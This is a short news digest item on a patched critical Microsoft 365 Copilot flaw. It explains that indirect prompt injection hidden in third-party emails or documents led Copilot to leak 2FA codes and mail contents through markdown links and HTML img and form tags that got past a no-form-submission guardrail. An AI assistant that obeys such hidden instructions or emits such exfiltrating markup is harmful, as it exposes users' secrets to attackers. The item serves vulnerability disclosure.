Critical M365 Copilot bug let attackers exfiltrate 2FA codes and emails
Microsoft patched a max-critical vulnerability in M365 Copilot last Tuesday, and researchers detailed a proof of concept Monday showing how the bug could extract 2FA codes and other sensitive data from emails Copilot could access. The exploit relied on indirect prompt injection embedded in third-party content the AI was asked to summarize or draft replies to.
Attackers bypassed Copilot's no-form-submission guardrail using markdown links and HTML tags like <img> and <form>, which trigger background web requests carrying secret data to attacker servers. The disclosure highlights the unresolved core problem that LLMs still can't distinguish user instructions from instructions hidden in content.
View full digest for June 17, 2026